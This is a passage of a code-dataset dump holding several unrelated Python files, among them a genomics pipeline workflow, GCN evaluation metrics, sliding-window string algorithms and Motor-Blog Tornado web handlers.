getattr(device, '_lastChange', ''))\n\n def queries(self):\n raise NotImplementedError\n \n def preprocess(self, results, log):\n if isinstance(results, Exception):\n log.error(results)\n return None\n return results\n","sub_path":"ZenPacks/zenoss/WindowsMonitor/WMIPlugin.py","file_name":"WMIPlugin.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"2734217","text":"import os\n\nimport pypeliner\nimport pypeliner.managed as mgd\nfrom wgs.utils import helpers\n\nfrom alignment import paired_alignment\nfrom sv_calling import call_breakpoints\nfrom variant_calling import call_variants\nfrom workflows import remixt\nfrom workflows import titan\n\n\ndef get_fastqs(inputs, samples, sample_type):\n fq1 = {}\n fq2 = {}\n\n for sample in samples:\n fastqs = inputs[sample]['fastqs'][sample_type]\n for lane in fastqs:\n fq1[(sample, lane)] = fastqs[lane]['fastq1']\n fq2[(sample, lane)] = fastqs[lane]['fastq2']\n\n return fq1, fq2\n\n\ndef wgs_workflow(args):\n pyp = pypeliner.app.Pypeline(config=args)\n workflow = pypeliner.workflow.Workflow()\n\n config = helpers.load_yaml(args['config_file'])\n inputs = helpers.load_yaml(args['input_yaml'])\n\n tumours = helpers.get_values_from_input(inputs, 'tumour')\n normals = helpers.get_values_from_input(inputs, 'normal')\n targets = helpers.get_values_from_input(inputs, 'target_list')\n samples = tumours.keys()\n\n workflow.setobj(\n obj=mgd.OutputChunks('sample_id'),\n value=samples,\n )\n\n if args['alignment']:\n tumour_fastqs_r1, tumour_fastqs_r2 = get_fastqs(inputs, samples, 'tumour')\n normal_fastqs_r1, normal_fastqs_r2 = get_fastqs(inputs, samples, 'normal')\n\n normal_alignment_template = os.path.join(\n args['out_dir'], 'alignment', '{norm_sample_id}', '{norm_lane}', 'normal'\n )\n tumour_alignment_template = os.path.join(\n args['out_dir'], 'alignment', '{tum_sample_id}', '{tum_lane}', 'tumour'\n )\n\n workflow.subworkflow(\n name='wgs_alignment_paired_lanes',\n func=paired_alignment,\n args=(\n config,\n mgd.OutputFile(\"tumour.bam\", 'sample_id', fnames=tumours,\n extensions=['.bai'], axes_origin=[]),\n mgd.OutputFile(\"normal.bam\", 'sample_id', fnames=normals,\n extensions=['.bai'], axes_origin=[]),\n samples,\n tumour_fastqs_r1,\n tumour_fastqs_r2,\n normal_fastqs_r1,\n normal_fastqs_r2,\n normal_alignment_template,\n tumour_alignment_template,\n )\n )\n\n museq_dir = os.path.join(args['out_dir'], 'variants')\n museq_vcf = os.path.join(museq_dir, '{sample_id}', 'museq_paired_annotated.vcf.gz')\n museq_ss_vcf = os.path.join(museq_dir, '{sample_id}', 'museq_single_annotated.vcf.gz')\n strelka_snv_vcf = os.path.join(museq_dir, '{sample_id}', 'strelka_snv_annotated.vcf.gz')\n strelka_indel_vcf = os.path.join(museq_dir, '{sample_id}', 'strelka_indel_annotated.vcf.gz')\n parsed_snv_csv = os.path.join(museq_dir, '{sample_id}', 'allcalls.csv')\n museq_paired_pdf = os.path.join(museq_dir, '{sample_id}', 'paired_museqportrait.pdf')\n museq_single_pdf = os.path.join(museq_dir, '{sample_id}', 'single_museqportrait.pdf')\n workflow.subworkflow(\n name='variant_calling',\n func=call_variants,\n args=(\n samples,\n config,\n mgd.OutputFile('parsed_snv_csv', 'sample_id', template=parsed_snv_csv, axes_origin=[]),\n mgd.InputFile(\"tumour.bam\", 'sample_id', fnames=tumours,\n extensions=['.bai'], axes_origin=[]),\n mgd.InputFile(\"normal.bam\", 'sample_id', fnames=normals,\n extensions=['.bai'], axes_origin=[]),\n mgd.OutputFile('museq', 'sample_id', template=museq_vcf, axes_origin=[]),\n mgd.OutputFile('museq_ss', 'sample_id', template=museq_ss_vcf, axes_origin=[]),\n mgd.OutputFile('strelka_snv', 'sample_id', template=strelka_snv_vcf, axes_origin=[]),\n mgd.OutputFile('strelka_indel', 'sample_id', template=strelka_indel_vcf, axes_origin=[]),\n mgd.OutputFile('museq_paired_pdf', 'sample_id', template=museq_paired_pdf, axes_origin=[]),\n mgd.OutputFile('museq_single_pdf', 'sample_id', template=museq_single_pdf, axes_origin=[]),\n )\n )\n\n sv_outdir = os.path.join(args['out_dir'], 'breakpoints', '{sample_id}')\n destruct_breakpoints = os.path.join(sv_outdir, 'destruct_breakpoints.csv')\n destruct_library = os.path.join(sv_outdir, 'destruct_library.csv')\n destruct_raw_breakpoints = os.path.join(sv_outdir, 'destruct_raw_breakpoints.csv')\n destruct_raw_library = os.path.join(sv_outdir, 'destruct_raw_library.csv')\n destruct_reads = os.path.join(sv_outdir, 'destruct_reads.csv')\n lumpy_vcf = os.path.join(sv_outdir, 'lumpy.vcf')\n parsed_csv = os.path.join(sv_outdir, 'filtered_consensus_calls.csv')\n workflow.subworkflow(\n name=\"call_breakpoints\",\n func=call_breakpoints,\n args=(\n samples,\n config,\n mgd.InputFile(\"tumour.bam\", 'sample_id', fnames=tumours,\n extensions=['.bai'], axes_origin=[]),\n mgd.InputFile(\"normal.bam\", 'sample_id', fnames=normals,\n extensions=['.bai'], axes_origin=[]),\n mgd.OutputFile('destruct_raw_breakpoints', 'sample_id', template=destruct_raw_breakpoints, axes_origin=[]),\n mgd.OutputFile('destruct_raw_library', 'sample_id', template=destruct_raw_library, axes_origin=[]),\n mgd.OutputFile('destruct_breakpoints', 'sample_id', template=destruct_breakpoints, axes_origin=[]),\n mgd.OutputFile('destruct_library', 'sample_id', template=destruct_library, axes_origin=[]),\n mgd.OutputFile('destruct_reads', 'sample_id', template=destruct_reads, axes_origin=[]),\n mgd.OutputFile('lumpy_vcf', 'sample_id', template=lumpy_vcf, axes_origin=[]),\n mgd.OutputFile('parsed_csv', 'sample_id', template=parsed_csv, axes_origin=[])\n )\n )\n\n cna_outdir = os.path.join(args['out_dir'], 'copynumber', '{sample_id}')\n remixt_raw_dir = os.path.join(cna_outdir, 'remixt', 'raw_data')\n titan_raw_dir = os.path.join(cna_outdir, 'titan')\n remixt_results_filename = os.path.join(cna_outdir, 'remixt', 'results.h5')\n titan_segments_filename = os.path.join(titan_raw_dir, 'segments.h5')\n titan_markers_filename = os.path.join(titan_raw_dir, 'markers.h5')\n titan_params_filename = os.path.join(titan_raw_dir, 'params.h5')\n workflow.subworkflow(\n name='titan',\n func=titan.create_titan_workflow,\n axes=('sample_id',),\n args=(\n mgd.InputFile('tumour.bam', 'sample_id', fnames=tumours, extensions=['.bai']),\n mgd.InputFile('normal.bam', 'sample_id', fnames=normals, extensions=['.bai']),\n mgd.InputFile(\"target_list\", 'sample_id', fnames=targets, axes_origin=[]),\n mgd.Template(titan_raw_dir, 'sample_id'),\n mgd.OutputFile('titan_segments_filename', 'sample_id', axes_origin=[], template=titan_segments_filename),\n mgd.OutputFile('titan_params_filename', 'sample_id', axes_origin=[], template=titan_params_filename),\n mgd.OutputFile('titan_markers_filename', 'sample_id', axes_origin=[], template=titan_markers_filename),\n config['globals'],\n config['cna_calling'],\n config['cna_calling']['titan_intervals'],\n mgd.InputInstance('sample_id'),\n ),\n )\n workflow.subworkflow(\n name='remixt',\n func=remixt.create_remixt_workflow,\n axes=('sample_id',),\n args=(\n mgd.InputFile('tumour.bam', 'sample_id', fnames=tumours, extensions=['.bai']),\n mgd.InputFile('normal.bam', 'sample_id', fnames=normals, extensions=['.bai']),\n mgd.InputFile('destruct_breakpoints', 'sample_id', axes_origin=[], template=destruct_breakpoints),\n mgd.InputInstance('sample_id'),\n config['cna_calling']['remixt_refdata'],\n mgd.OutputFile('remixt_results_filename', 'sample_id', axes_origin=[], template=remixt_results_filename),\n mgd.Template(remixt_raw_dir, 'sample_id'),\n config['cna_calling']['min_num_reads']\n ),\n )\n\n pyp.run(workflow)\n","sub_path":"wgs/wgs_workflow.py","file_name":"wgs_workflow.py","file_ext":"py","file_size_in_byte":8127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"181549732","text":"import logging\nfrom typing import Tuple, Dict, List\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as f\nfrom sklearn.metrics import accuracy_score, roc_auc_score, precision_score, recall_score, f1_score\n\nfrom model.gcn import GraphConvolutionalNetwork, DEVICE\n\n# Set up logging\nlogger = logging.getLogger(__name__)\n\n\ndef predict_prob(\n model: GraphConvolutionalNetwork,\n input: torch.Tensor,\n adjacency: torch.Tensor,\n positive_class_id: int = 1\n) -> float:\n predicted_probs = f.softmax(model(input=input, adjacency=adjacency), dim=-1).detach()\n return predicted_probs.data.cpu().numpy()[positive_class_id]\n\n\ndef calculate_metrics(\n model: GraphConvolutionalNetwork,\n data: List[Tuple[torch.Tensor, torch.Tensor, torch.Tensor]],\n positive_class_id: int = 1\n) -> Dict[str, float]:\n predicted_probs = []\n targets = []\n for input, adjacency, target in data:\n\n # Send data to device\n input = input.to(DEVICE)\n adjacency = adjacency.to(DEVICE)\n\n # Get predicted probability of positive class from model and target classes\n predicted_probs.append(\n predict_prob(\n model=model,\n input=input,\n adjacency=adjacency,\n positive_class_id=positive_class_id\n )\n )\n targets.append(target.item() == positive_class_id)\n\n predicted_classes = np.array(predicted_probs) > 0.5\n return {\n \"accuracy\": accuracy_score(targets, predicted_classes),\n \"auc\": roc_auc_score(targets, predicted_probs),\n \"precision\": precision_score(targets, predicted_classes),\n \"recall\": recall_score(targets, predicted_classes),\n \"f1\": f1_score(targets, predicted_classes)\n }\n\n\ndef log_metrics(metrics: Dict[str, any], metrics_to_log: List[str]) -> None:\n for metric_name in metrics_to_log:\n logger.info(f\"{metric_name}: \\t {'{0:.3f}'.format(metrics[metric_name])}\")\n","sub_path":"src/utils/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"261051313","text":"class TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\nfrom Tree import treeTool\nclass Solution(object):\n def kthSmallest(self, root, k):\n \"\"\"\n :type root: TreeNode\n :type k: int\n :rtype: int\n \"\"\"\n if k == 0:\n return None\n # write code here\n path = []\n\n def getKval(root, k, path):\n if root.left != None:\n getKval(root.left, k, path)\n if len(path) == k:\n return\n path.append(root.val)\n if root.right:\n getKval(root.right, k, path)\n\n getKval(root, k, path)\n\n return path[-1]\n\n\nif __name__ == \"__main__\":\n myT = treeTool.createBinaryTree([5,3,6,2,4,'#','#',1,'#'])\n a =Solution()\n print(a.kthSmallest(myT,3))\n print(\"Done!\")\n\n\n\n\n\n\n","sub_path":"Tree/Leetcode_203/Mycode.py","file_name":"Mycode.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"577587129","text":"from pyplasm import *\nfrom larlib import *\n\ndef createStructure(vertex, cells):\n\t\"\"\"\n\tcreates roof\n\tArgs:\n\t:param vertex: set of vertices \n\t:param cells: set of cells\n\n\tReturns:\n\t3D value of type HPC representing the bone structure of the roof\n\t\"\"\"\n\tstructure = MKPOL([vertex, cells, None])\n\tstructure = SKELETON(1)(structure)\n\tstructure = OFFSET([0.2, 0.2, 0.2])(structure)\n\treturn structure\n\ndef createFaces(vertex, cells):\n\t\"\"\"\n\tcreates faces of the roof\n\tArgs:\n\t:param vertex: set of vertices \n\t:param cells: set of cells\n\n\tReturns:\n\t3D value of type HPC representing the faces of the roof\n\t\"\"\"\n\tfaces = MKPOL([vertex, cells, None])\n\tfaces = OFFSET([1.0, 1.0, 1.0])(faces)\n\tfaces = COLOR(BROWN)(faces)\n\treturn faces\n\ndef ggpl_buildRoof(vertex, cells) :\n\t\"\"\"\n\tcreates roof\n\tArgs:\n\t:param vertex: set of vertices \n\t:param cells: set of cells\n\n\tReturns:\n\t3D value of type HPC representing the roof\n\t\"\"\"\n\tstructure = createStructure(vertex, cells)\n\tfaces = createFaces(vertex, cells)\n\troof = STRUCT([faces, T(3)(-0.2), structure])\n\treturn roof\n\nif __name__ == '__main__':\n\tvertex = [(0.0, 0.0, 0.0), (16.0, 0.0, 0.0), (13.0, 12.5, 6.0), (3.0, 12.5, 6.0), (16.0, 25.0, 0.0), (0.0, 25.0, 0.0)]\n\tcells = [[1, 2, 3, 4], [1, 4, 6], [2, 3, 5], [3, 4, 5, 6]]\n\tresult = ggpl_buildRoof(vertex, cells)\n\tVIEW(result)\t","sub_path":"2017-01-27/workshop_04.py","file_name":"workshop_04.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"8800077","text":"import falcon\n\nfrom meniscus.api import ApiResource\nfrom meniscus.api.callback import callback_methods\n\nTYPE_HEADER = 'TYPE'\nROUTES = 'ROUTES'\n\n\nclass CallbackResource(ApiResource):\n def on_head(self, req, resp):\n #get message token, or abort if token is not in header\n type_header = req.get_header(TYPE_HEADER, required=True)\n\n if ROUTES in type_header:\n callback_methods.get_routes_from_coordinator()\n\n resp.status = falcon.HTTP_200\n","sub_path":"meniscus/api/callback/resources.py","file_name":"resources.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"552543408","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 16 16:50:44 2018\n\n@author: Franc\n\"\"\"\nimport numpy as np\n\nfrom steppy.base import BaseTransformer\nfrom steppy.utils import get_logger\n\nlogger = get_logger()\n\nclass ApplResample(BaseTransformer):\n \n def __init__(self, data, ratio, seed):\n self.df = data\n self.ratio = ratio\n self.seed = seed\n self.output = {'train':{},'test':None,'eval':None}\n \n def train_test_split(self):\n df_0 = self.df.query('TARGET == 0').reset_index(drop=True)\n df_1 = self.df.query('TARGET == 1').reset_index(drop=True)\n df_test = self.df.query('TARGET == 2').reset_index(drop=True)\n \n m, n = len(df_0), len(df_1)\n np.random.seed(self.seed)\n m_eval_index = np.random.permutation(m)\n np.random.seed(self.seed)\n n_eval_index = np.random.permutation(n)\n \n df_0_eval = df_0.iloc[m_eval_index[:1],:]\n df_defaultless = df_0.iloc[m_eval_index[1:],:]\n \n df_1_eval = df_1.iloc[n_eval_index[:1],:]\n df_default = df_1.iloc[n_eval_index[1:],:]\n \n df_eval = df_0_eval.append(df_1_eval).reset_index(drop=True)\n \n self.output['test'] = df_test\n self.output['eval'] = df_eval\n return {'defaultless': df_defaultless,\n 'default': df_default}\n \n def data_split(self):\n df = self.train_test_split()\n df_default, df_defaultless = df['default'], df['defaultless']\n \n n_default = len(df_default)\n n_defaultless = self.ratio*n_default\n m = len(df_defaultless)\n \n np.random.seed(self.seed)\n m_shuffle = np.random.permutation(m)\n for i in range(int(m/n_defaultless)):\n self.output['train']['sample_%d'%i] = df_defaultless.\\\n iloc[m_shuffle[int(i*n_defaultless):int((i+1)*n_defaultless)],:].\\\n append(df_default)\n return self.output\n \n \n \n \n \n ","sub_path":"# Credit/code/main_sample.py","file_name":"main_sample.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"388278103","text":"#기말 2\ndef makeMatrix(m):\n import random\n a = []\n for i in range(m):\n b = []\n for j in range(m):\n if i == j:\n b.append(0)\n else:\n b.append(random.randint(0, 1))\n a.append(b)\n return a\n\ndef printMatrix(a):\n n = len(a)\n for i in range(n):\n for j in range(n):\n print(a[i][j], end=' ')\n print()\n\ndef exchangeMatrix(a):\n c1 = 0\n c2 = 0\n for i in range(len(a)):\n for j in range(len(a[i])):\n if i < j:\n if a[i][j] == a[j][i]:\n c1 += 1\n else:\n c2 += 1\n a[i][j], a[j][i] = a[j][i], a[i][j]\n return c1, c2, a\n\n\nN = int(input('N = '))\nx = makeMatrix(N)\nprintMatrix(x)\nprint()\nresult = exchangeMatrix(x)\nprint('대칭인 원소의 개수 : ', result[0])\nprint('대칭이 아닌 원소의 개수 : ', result[1])\nprint()\nprintMatrix(result[2])\n","sub_path":"84.py","file_name":"84.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"294728983","text":"# def lengthOfLongestSubstring(s):\n# \tfrom collections import defaultdict\n# \tlookup = defaultdict(int)\n#\n# \ti = 0\n# \tj = 0\n#\n# \tans = 0\n# \tcounter = 0\n# \twhile j < len(s):\n# \t\tprint('------')\n# \t\tprint('outer ', s[i:j + 1])\n# \t\tif lookup[s[j]] > 0: # 当前字符已经存在\n# \t\t\tcounter += 1 # 窗口准备缩1位 记录有多少个字符出现过1次了\n# \t\tlookup[s[j]] += 1 # 更新当前字符的occurrence\n# \t\tj += 1\n#\n# \t\twhile counter > 0: #\n# \t\t\tprint('inner ', s[i:j])\n# \t\t\tif lookup[s[i]] > 1: # 首位字符已经出现多次了\n# \t\t\t\tcounter -= 1\n#\n# \t\t\tlookup[s[i]] -= 1 # 首位字符将不再窗口范围内\n# \t\t\ti += 1\n# \t\tans = max(ans, j - i)\n# \treturn ans\n\ndef lengthOfLongestSubstring(s):\n\tfrom collections import defaultdict\n\tlookup = defaultdict(int)\n\n\ti = 0\n\tj = 0\n\n\tans = 0\n\tcounter = 0\n\twhile j < len(s):\n\t\tprint('------')\n\t\tprint('outer ', s[i:j + 1])\n\t\tif lookup[s[j]] == 1: # 当前字符已经存在\n\t\t\tcounter += 1 # 窗口准备缩1位 记录有多少个字符出现过1次了\n\t\tlookup[s[j]] += 1 # 更新当前字符的occurrence\n\t\tj += 1\n\n\t\twhile counter > 0: #\n\t\t\tprint('inner ', s[i:j])\n\t\t\tif lookup[s[i]] == 2: # 找到已经出现2次了的首位字符\n\t\t\t\tcounter -= 1\n\n\t\t\tlookup[s[i]] -= 1 # 首位字符将不再窗口范围内\n\t\t\ti += 1\n\t\tans = max(ans, j - i)\n\treturn ans\n\n'''\n3. 无重复字符的最长子串 medium\n多个字符,但是各字符的个数只能为1\n\nabcabcbb\n------\nouter a\n------\nouter ab\n------\nouter abc\n------\nouter abca\ninner abca\n------\nouter bcab\ninner bcab\n------\nouter cabc\ninner cabc\n------\nouter abcb\ninner abcb\ninner bcb\n------\nouter cbb\ninner cbb\ninner bb\n3\n\n'''\n\n\ndef lengthOfLongestSubstringTwoDistinct(s):\n\tfrom collections import defaultdict\n\tlookup = defaultdict(int)\n\ti, j, counter, ans = 0, 0, 0, 0\n\n\twhile j < len(s):\n\t\tprint('------')\n\t\tprint('outer ', s[i:j + 1])\n\n\t\tif lookup[s[j]] == 0: #新的字符,开始 #记录有多少个不同字符\n\t\t\tcounter += 1\n\t\tlookup[s[j]] += 1\n\t\tj += 1\n\n\t\twhile counter > 2: # counter = 3 有3个不同字符\n\t\t\tprint('inner ', s[i:j])\n\t\t\tif lookup[s[i]] == 1: #找到多余的字符,其他字符应该有多个重复的\n\t\t\t\tcounter -= 1\n\t\t\tlookup[s[i]] -= 1\n\t\t\ti += 1\n\t\tans = max(ans, j - i)\n\treturn ans\n\n\n'''\n159. 至多包含两个不同字符的最长子串 medium\n最多包含两个不同的字符,但是各字母的个数不限制\n\n\"eceba\"\n\nece\n\neceb -> ceb\nceba\n\n------\nouter e\n------\nouter ec\n------\nouter ece\n------\nouter eceb\ninner eceb\ninner ceb\n------\nouter eba\ninner eba\n3\n\n\"ccaabbb\"\n------\nouter c\n------\nouter cc\n------\nouter cca\n------\nouter ccaa\n------\nouter ccaab\ninner ccaab\ninner caab\n------\nouter aabb\n------\nouter aabbb\n5\n\n'''\nprint(lengthOfLongestSubstring(\"abcabcbb\"))\nprint(lengthOfLongestSubstringTwoDistinct('eceba'))\nprint(lengthOfLongestSubstringTwoDistinct(\"ccaabbb\"))\n\n\ndef lengthOfLongestSubstringKDistinct(s, k):\n\tfrom collections import defaultdict\n\tlookup = defaultdict(int)\n\tstart = 0\n\tend = 0\n\tmax_len = 0\n\tcounter = 0\n\twhile end < len(s):\n\t\tif lookup[s[end]] == 0:\n\t\t\tcounter += 1\n\t\tlookup[s[end]] += 1\n\t\tend += 1\n\t\twhile counter > k:\n\t\t\tif lookup[s[start]] == 1:\n\t\t\t\tcounter -= 1\n\t\t\tlookup[s[start]] -= 1\n\t\t\tstart += 1\n\t\tmax_len = max(max_len, end - start)\n\treturn max_len\n\n'''\n340. 至多包含 K 个不同字符的最长子串\n'''\nprint(lengthOfLongestSubstringKDistinct('abcabcbb',1))\n\n'''\n76. 最小覆盖子串 hard\n\n输入: S = \"ADOBECODEBANC\", T = \"ABC\"\n输出: \"BANC\"\n\n'''\n\n\ndef minWindow( s, t):\n\tfrom collections import defaultdict\n\timport sys\n\tlookup = defaultdict(int)\n\tfor c in t:\n\t\tlookup[c] += 1\n\ti, j = 0, 0\n\tcounter = len(t)\n\tmin_length = float('inf')\n\tans = ''\n\n\twhile j < len(s):\n\t\tprint('------')\n\t\tprint('outer ', s[i:j + 1],lookup,'counter:',counter)\n\t\tif lookup[s[j]] > 0:\n\t\t\tcounter -= 1\n\t\tlookup[s[j]] -= 1\n\t\tj += 1\n\t\twhile counter == 0:\n\t\t\tprint('inner ', s[i:j],lookup,'counter:',counter)\n\t\t\tif min_length > j - i:\n\t\t\t\tmin_length = j - i\n\t\t\t\tans = s[i:j]\n\t\t\tif lookup[s[i]] == 0:\n\t\t\t\tcounter += 1\n\t\t\tlookup[s[i]] += 1\n\t\t\ti += 1\n\treturn ans\nprint(minWindow('ADOBECODEBANC','ABC'))\nl = [1,2,3,4]\nprint(l[0:])","sub_path":"sliding_window.py","file_name":"sliding_window.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"541950255","text":"\"\"\"Web frontend for motor-blog: actually show web pages to visitors\n\"\"\"\n\nimport datetime\nimport email.utils\nimport functools\nimport time\n\nimport tornado.web\nfrom tornado import gen\nfrom tornado.options import options as opts\nfrom werkzeug.contrib.atom import AtomFeed\n\nfrom motor_blog.models import Post, Category\nfrom motor_blog import cache, models\nfrom motor_blog.text.link import absolute\nfrom motor_blog.web.lytics import ga_track_event_url\n\n\n__all__ = (\n # Web\n 'HomeHandler', 'PostHandler', 'AllPostsHandler',\n 'CategoryHandler', 'TagHandler', 'SearchHandler',\n\n # Atom\n 'FeedHandler',\n)\n\n# TODO: cache-control headers\n\n\nclass MotorBlogHandler(tornado.web.RequestHandler):\n def initialize(self, **kwargs):\n super(MotorBlogHandler, self).initialize(**kwargs)\n self.categories = []\n self.db = self.settings['db']\n\n def get_template_namespace(self):\n ns = super(MotorBlogHandler, self).get_template_namespace()\n\n def get_setting(setting_name):\n return self.application.settings[setting_name]\n\n # TODO: use ui_methods instead of this\n ns.update({\n 'q': '',\n 'setting': get_setting,\n 'categories': self.categories,\n 'absolute': absolute})\n\n return ns\n\n def head(self, *args, **kwargs):\n # We need to generate the full content for a HEAD request in order\n # to calculate Content-Length. Tornado knows this is a HEAD and omits\n # the content.\n self.get(*args, **kwargs)\n\n def get_current_user(self):\n \"\"\"Logged-in username or None\"\"\"\n return self.get_secure_cookie('auth')\n\n def get_login_url(self):\n return self.reverse_url('login')\n\n @cache.cached(key='categories', invalidate_event='categories_changed')\n @gen.coroutine\n def get_categories(self):\n cursor = self.db.categories.find().sort('name')\n category_docs = yield cursor.to_list(100)\n\n raise gen.Return(category_docs)\n\n @gen.coroutine\n def get_posts(self, *args, **kwargs):\n raise NotImplementedError()\n\n def compute_etag(self):\n # Don't waste time md5summing the output, we'll rely on the\n # Last-Modified header\n # TODO: what's the cost?\n return None\n\n\n# TODO: ample documentation, refactor\ndef check_last_modified(get):\n @functools.wraps(get)\n @gen.coroutine\n def _get(self, *args, **kwargs):\n category_docs = yield self.get_categories()\n self.categories = categories = [\n Category(**doc) for doc in category_docs]\n\n post_docs = yield self.get_posts(*args, **kwargs)\n if post_docs:\n self.posts = posts = [\n Post(**doc) if doc else None\n for doc in post_docs]\n else:\n self.posts = posts = []\n\n if posts or categories:\n mod = max(\n thing.last_modified\n for things in (posts, categories)\n for thing in things if thing)\n\n # If-Modified-Since header is only good to the second. Truncate\n # our own mod-date to match its precision.\n mod = mod.replace(microsecond=0)\n self.set_header('Last-Modified', mod)\n\n # Adapted from StaticFileHandler\n ims_value = self.request.headers.get(\"If-Modified-Since\")\n if ims_value is not None:\n date_tuple = email.utils.parsedate(ims_value)\n if_since = models.utc_tz.localize(\n datetime.datetime.fromtimestamp(time.mktime(date_tuple)))\n if if_since >= mod:\n # No change since client's last request. Tornado will take\n # care of the rest.\n self.set_status(304)\n self.finish()\n return\n\n # Yielding, and returning result, are unneeded. We're not waiting for\n # a return value, we're waiting for get() to call finish(). But let's\n # yield and return anyway for sanity's sake.\n result = yield gen.coroutine(get)(self, *args, **kwargs)\n raise gen.Return(result)\n\n return _get\n\n\nclass HomeHandler(MotorBlogHandler):\n @gen.coroutine\n def get_posts(self, page_num=0):\n cursor = (self.db.posts.find(\n {'status': 'publish', 'type': 'post'},\n {'original': False},\n ).sort([('pub_date', -1)])\n .skip(int(page_num) * 10)\n .limit(10))\n\n result = yield cursor.to_list(100)\n raise gen.Return(result)\n\n @tornado.web.addslash\n @check_last_modified\n def get(self, page_num=0):\n self.render(\n 'home.jade',\n posts=self.posts, categories=self.categories,\n page_num=int(page_num))\n\n\nclass AllPostsHandler(MotorBlogHandler):\n @gen.coroutine\n def get_posts(self):\n cursor = (self.db.posts.find(\n {'status': 'publish', 'type': 'post'},\n {'original': False},\n )\n .sort([('pub_date', -1)]))\n\n results = yield cursor.to_list(100)\n raise gen.Return(results)\n\n @tornado.web.addslash\n @check_last_modified\n def get(self):\n self.render(\n 'all-posts.jade',\n posts=self.posts, categories=self.categories)\n\n\nclass PostHandler(MotorBlogHandler):\n \"\"\"Show a single blog post or page\"\"\"\n @gen.coroutine\n def get_posts(self, slug):\n slug = slug.rstrip('/')\n posts = self.db.posts\n postdoc = yield posts.find_one(\n {'slug': slug, 'status': 'publish'},\n {'summary': False, 'original': False})\n\n if not postdoc:\n raise tornado.web.HTTPError(404)\n\n if postdoc['type'] == 'redirect':\n # This redirect marks where a real post or page used to be.\n # Send the client there. Note we don't run the callback; we're\n # done.\n url = self.reverse_url('post', postdoc['redirect'])\n self.redirect(url, permanent=True)\n return\n\n # Only posts have prev / next navigation, not pages\n elif postdoc['type'] == 'post':\n fields = {'summary': False, 'body': False, 'original': False}\n prev_doc_future = posts.find_one({\n 'status': 'publish', 'type': 'post',\n 'pub_date': {'$lt': postdoc['pub_date']}\n }, fields, sort=[('pub_date', -1)])\n\n next_doc_future = posts.find_one({\n 'status': 'publish', 'type': 'post',\n 'pub_date': {'$gt': postdoc['pub_date']}\n }, fields, sort=[('pub_date', 1)])\n\n # Overkill for this case, but in theory we reduce latency by\n # querying for previous and next posts at once, and waiting for\n # both.\n prevdoc, nextdoc = yield [prev_doc_future, next_doc_future]\n else:\n prevdoc, nextdoc = None, None\n\n # Done\n raise gen.Return([prevdoc, postdoc, nextdoc])\n\n @tornado.web.addslash\n @check_last_modified\n def get(self, slug):\n prev_post, post, next_post = self.posts\n self.render(\n 'single.jade',\n post=post,\n prev=prev_post,\n next=next_post,\n categories=self.categories)\n\n\nclass CategoryHandler(MotorBlogHandler):\n \"\"\"Page of posts for a category\"\"\"\n @gen.coroutine\n def get_posts(self, slug, page_num=0):\n page_num = int(page_num)\n slug = slug.rstrip('/')\n cursor = (self.db.posts.find({\n 'status': 'publish',\n 'type': 'post',\n 'categories.slug': slug,\n }, {\n 'original': False\n }).sort(\n [('pub_date', -1)]\n ).skip(page_num * 10).limit(10))\n\n results = yield cursor.to_list(100)\n raise gen.Return(results)\n\n @tornado.web.addslash\n @check_last_modified\n def get(self, slug, page_num=0):\n page_num = int(page_num)\n slug = slug.rstrip('/')\n for this_category in self.categories:\n if this_category.slug == slug:\n break\n else:\n raise tornado.web.HTTPError(404)\n\n self.render(\n 'category.jade',\n posts=self.posts, categories=self.categories,\n this_category=this_category, page_num=page_num)\n\n\n# TODO: move to feed.py\nclass FeedHandler(MotorBlogHandler):\n @gen.coroutine\n def get_posts(self, slug=None):\n query = {'status': 'publish', 'type': 'post'}\n\n if slug:\n slug = slug.rstrip('/')\n query['categories.slug'] = slug\n\n cursor = (self.db.posts.find(\n query,\n {'summary': False, 'original': False},\n ).sort([('pub_date', -1)])\n .limit(20))\n\n results = yield cursor.to_list(100)\n raise gen.Return(results)\n\n @check_last_modified\n def get(self, slug=None):\n if slug:\n slug = slug.rstrip('/')\n\n this_category = None\n if slug:\n # Get all the categories and search for one with the right slug,\n # instead of actually querying for the right category, since\n # get_categories() is cached.\n slug = slug.rstrip('/')\n for category in self.categories:\n if category.slug == slug:\n this_category = category\n break\n else:\n raise tornado.web.HTTPError(404)\n\n title = opts.blog_name\n\n if this_category:\n title = '%s - Posts about %s' % (title, this_category.name)\n\n author = {'name': opts.author_display_name, 'email': opts.author_email}\n if this_category:\n feed_url = absolute(\n self.reverse_url('category-feed', this_category.slug))\n else:\n feed_url = absolute(self.reverse_url('feed'))\n\n if self.posts:\n updated = max(max(p.mod, p.date_created) for p in self.posts)\n else:\n updated = datetime.datetime.now(tz=self.application.settings['tz'])\n\n # referer = self.request.headers.get('referer', '-') # (sic)\n icon = absolute(\n self.reverse_url('theme-static', '/theme/static/square96.png'))\n\n generator = (\n 'Motor-Blog', 'https://github.com/ajdavis/motor-blog', '0.1')\n\n feed = AtomFeed(\n title=title,\n feed_url=feed_url,\n url=absolute(self.reverse_url('home')),\n author=author,\n updated=updated,\n # TODO: customizable icon, also a 'logo' kwarg\n icon=icon,\n generator=generator)\n\n for post in self.posts:\n url = absolute(self.reverse_url('post', post.slug))\n tracking_pixel_url 